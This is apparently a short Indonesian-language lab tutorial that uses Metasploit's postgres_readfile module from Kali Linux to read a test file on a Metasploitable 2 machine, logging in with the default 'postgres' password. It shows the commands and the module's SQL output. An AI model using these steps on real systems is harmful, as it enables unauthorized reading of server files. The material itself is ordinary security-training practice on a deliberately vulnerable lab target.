Cara Membaca Isi File Di OS Metasploitable 2 Menggunakan AdminPostgres Auxiliary Modules

OS Target : Metasploitable 2 (Ubuntu Based)

OS Penyerang : Kali Linux

IP Target : 192.168.1.4

IP Penyerang : 192.168.1.2

Sumber Tutorial Referensi :

http://www.offensive-security.com/metasploit-unleashed/Admin_Postgres_Auxiliary_Modules

Dengan menggunakan postgres_readfile maka kita bisa membaca isi sebuah file. Dalam contoh ini saya menggunakan file sederhana berformat .txt . Sebelum menjalankan module Metasploit tersebut, saya membuat terlebih dahulu file bernama test.txt di lokasi:

/home/msfadmin

Saya membuatnya menggunakan text editor nano, isinya filenya berupa tulisan: haloooo .

Kemudian kita buka msfconsole di Kali Linux. Setelah masuk di msfconsole, langsung ketikan perintah berikut ini:

use auxiliary/admin/postgres/postgres_readfile

Kemudian ketikan perintah:

set PASSWORD postgres

set RFILE /home/msfadmin/test.txt

set RHOST 192.168.1.4

run

Maka akan muncul hasil:

Query Text: 'CREATE TEMP TABLE QLouHd (INPUT TEXT); COPY QLouHd FROM '/home/msfadmin/test.txt'; SELECT * FROM QLouHd'=================================================================================================================================

input ----- haloooo